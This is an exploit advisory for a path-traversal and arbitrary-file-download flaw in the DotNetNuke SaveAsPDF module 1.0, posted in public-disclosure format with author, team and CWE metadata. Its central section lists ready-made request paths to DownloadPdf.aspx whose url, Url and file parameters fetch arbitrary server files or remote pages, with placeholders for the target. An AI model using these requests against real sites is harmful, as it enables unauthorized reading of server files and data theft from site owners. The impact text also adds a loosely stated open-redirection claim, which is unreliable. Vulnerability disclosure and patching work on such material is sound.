#################################################################### # Exploit Title : DotNetNuke SaveAsPDF Modules 1.0 Arbitrary File Download # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 12/03/2019 # Vendor Homepage : bizmodules.net ~ dnnsoftware.com # Software Information Links : bizmodules.net/Products/SaveasPDF/tabid/188/Default.aspx bizmodules.net/portals/0/downloads/sap.pdf # Software Version : 1.0 ~ Compatible with DNN 4.5.x and 5.0.x # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Vulnerability Type : CWE-200 [ Information Exposure ] CWE-23 [ Relative Path Traversal ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos #################################################################### # Description about Software : *************************** Save As PDF (SAP) is a DotNetNuke (DNN) application designed to work in DotNetNuke websites only. SAP is used to convert a DotNetNuke page to Adobe PDF format, including texts, pictures and even flash contents. #################################################################### # Impact : *********** * DotNetNuke SaveAsPDF Modules 1.0 is prone to a vulnerability that lets attackers download arbitrary files because the application fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files within the context of the web server process and obtain potentially sensitive informations and it works for open redirection vulnerability. * An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information. * The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory. #################################################################### # Arbitrary File Download Exploit : ******************************* /DesktopModules/SaveAsPDF/DownloadPdf.aspx?url=https://www.[RANDOMWEBSITE].gov /DesktopModules/SaveAsPDF/DownloadPdf.aspx?Name=[ID-NUMBER]&Url=[FILENAME] /DesktopModules/SaveAsPDF/DownloadPdf.aspx?Name=[ID-NUMBER]&file=[FILENAME] Note : It can download any random website as pdf file in to your computer and it downloads a system files from DNNSoftware. #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################